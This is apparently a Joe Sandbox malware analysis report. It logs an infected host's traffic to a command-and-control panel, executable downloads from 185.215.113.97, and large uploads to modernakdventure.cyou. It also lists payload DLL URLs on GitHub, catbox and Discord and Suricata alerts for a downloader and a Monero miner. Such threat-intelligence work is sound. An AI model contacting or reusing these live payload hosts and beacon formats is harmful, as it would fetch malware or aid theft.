Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.97 185.215.113.97

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51667 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51670 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51678 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51681 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51682 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51685 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51689 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51692 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51690 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51698 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51694 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2040353 - Severity 2 - ET COINMINER Observed DNS Query to Cryptocurrency Mining Pool Domain (xmr .2miners .com) : 192.168.2.9:49281 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.9:51780 -> 162.19.139.184:2222

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: modernakdventure.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: modernakdventure.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0BPXLOF17D2DSCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12815Host: modernakdventure.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ALQJWRFAV8YCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15027Host: modernakdventure.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7LCPSZXZP1FCFTXCKCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20573Host: modernakdventure.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6H9P6J229Cookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2388Host: modernakdventure.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7TB8ATJEUPPA4YCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569619Host: modernakdventure.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: modernakdventure.cyou

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97

Source: global traffic	HTTP traffic detected: GET /attachments/1336331746618376235/1337207374028738580/Sarcastic_Setup.exe?ex=67a69aea&is=67a5496a&hm=3b32825118cc0d524c597462379541f592a0aaa009acbf73f5e08d6fb678b84e& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/5957639473/kUHbhqh.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/6875802221/Ryu8yUx.exe HTTP/1.1Host: 185.215.113.97

Source: global traffic	DNS traffic detected: DNS query: modernakdventure.cyou
Source: global traffic	DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: xmr.2miners.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: modernakdventure.cyou

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 10 Feb 2025 18:50:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M67HzqnBl18qFMJMsV6Pe4JoFvNpv9kGabkfViFrA2S3NO3uqSOVu1UQThSIodD9ERLZY0HodpZJGOvZGEOUfWlMyC9hvPnWX0HHv0mId6r2JqdsEaPtj9fOfoeDiDBpT2PW4H%2F%2BXYo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90fe492cdce8437a-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Feb 2025 18:52:48 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=QsO8FwJk3bk_pJrnIVlmFimn_IZdAUeB1ovWNL8KVkc-1739213568-1.0.1.1-NsHx.E_CJDKV_lsaid1d3bUPWUIPuaBiXpxL86o3WGq5jzgxqtAr7EFx_L7gdxxTFn9M_G.yGArs1NHEeyiz_w; path=/; expires=Mon, 10-Feb-25 19:22:48 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aCfPOfzUYC6cuhWuPpxTJlMpsfP7GpvZAqGvdqS1AUq8LerxMlY53xqxi1WZgZWXZWLl%2B2xoF6YGiwRzn63GI8j1099aLNygKmYRfJGFrvPkRuO6Oqw3RlaFnZBByGqE3E4jVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=ia_oGsF.HgF8Huj5OdbwSKheTwb_u6GkFJ0wlgqsBwY-1739213568502-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90fe4c62fcd1428b-EWRalt-svc: h3=":443"; ma=86400

Source: kUHbhqh.exe, 0000000B.00000003.2154868593.0000020E9A02B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: kUHbhqh.exe, 0000000B.00000003.2154868593.0000020E9A02B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c646809ce4
Source: powershell.exe, 0000001D.00000002.2772403978.000002815DE19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2940342709.000001C759C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001D.00000002.2728808016.000002814DFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C749E47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000001D.00000002.2728808016.000002814DDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C749C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B47AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001D.00000002.2728808016.000002814DFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C749E47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001F.00000002.2955986368.000001C761F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Stamp_Setup.exe, 00000017.00000003.2644650082.0000000002380000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.exe, 00000017.00000003.2645334529.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 00000018.00000000.2646578799.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Stamp_Setup.tmp.25.dr	String found in binary or memory: http://www.innosetup.com/
Source: powershell.exe, 0000001F.00000002.2951815408.000001C761D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000023.00000002.3199227299.0000011B5FE9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: Stamp_Setup.exe, 00000017.00000003.2644650082.0000000002380000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.exe, 00000017.00000003.2645334529.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 00000018.00000000.2646578799.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Stamp_Setup.tmp.25.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: powershell.exe, 0000001D.00000002.2728808016.000002814DDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C749C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B47AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B4943D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B496F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B4971B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001F.00000002.2844312144.000001C74B875000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C74B84F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B496F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B4971B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: kUHbhqh[1].exe.7.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
Source: regsvr32.exe, 0000001C.00000003.3530737909.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3526491127.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3528802556.000000001AF23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/k541xr.dllJ
Source: regsvr32.exe, 0000001C.00000003.3527563926.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3526491127.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3528802556.000000001AF23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/kwfxr7.dll
Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: regsvr32.exe, 0000001C.00000003.3548142267.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3530737909.000000001AF23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/raz23-bot/22/raw/refs/heads/main/plugin3
Source: regsvr32.exe, 0000001C.00000003.3527563926.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3526491127.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3528802556.000000001AF23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/raz23-bot/22/raw/refs/heads/main/plugin3.dll
Source: powershell.exe, 0000001F.00000002.2844312144.000001C74BBF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B49A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000023.00000002.3195696699.0000011B5FDE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 0000001D.00000002.2782647331.0000028166200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5mation
Source: Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010DD000.00000004.00000020.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.2260351341.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://modernakdventure.cyou/
Source: Ryu8yUx.exe, 0000000D.00000002.2260351341.0000000003670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://modernakdventure.cyou/3M
Source: Ryu8yUx.exe, 0000000D.00000002.2259554211.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://modernakdventure.cyou/api
Source: powershell.exe, 0000001D.00000002.2772403978.000002815DE19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2940342709.000001C759C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 51681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51767
Source: unknown	Network traffic detected: HTTP traffic on port 51765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51681
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51682
Source: unknown	Network traffic detected: HTTP traffic on port 51767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51685
Source: unknown	Network traffic detected: HTTP traffic on port 51694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51690
Source: unknown	Network traffic detected: HTTP traffic on port 51682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51698
Source: unknown	Network traffic detected: HTTP traffic on port 51690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51685 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51685 version: TLS 1.2
